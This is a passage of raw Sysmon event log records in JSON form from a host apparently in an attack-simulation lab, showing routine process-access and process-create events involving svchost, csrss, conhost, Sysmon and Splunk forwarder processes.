07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FB8-5F25-0000-001017E10400}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FB8-5F25-0000-001017E10400}","TargetProcessId":"4324","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.517\r\nProcessGuid: {41C8662E-1FBA-5F25-0000-00107BE30400}\r\nProcessId: 3380\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.517","ProcessGuid":"{41C8662E-1FBA-5F25-0000-00107BE30400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FBA-5F25-0000-00107BE30400}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FBA-5F25-0000-00107BE30400}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FBA-5F25-0000-00107BE30400}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:34.516","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FBA-5F25-0000-00107BE30400}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:34.516\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 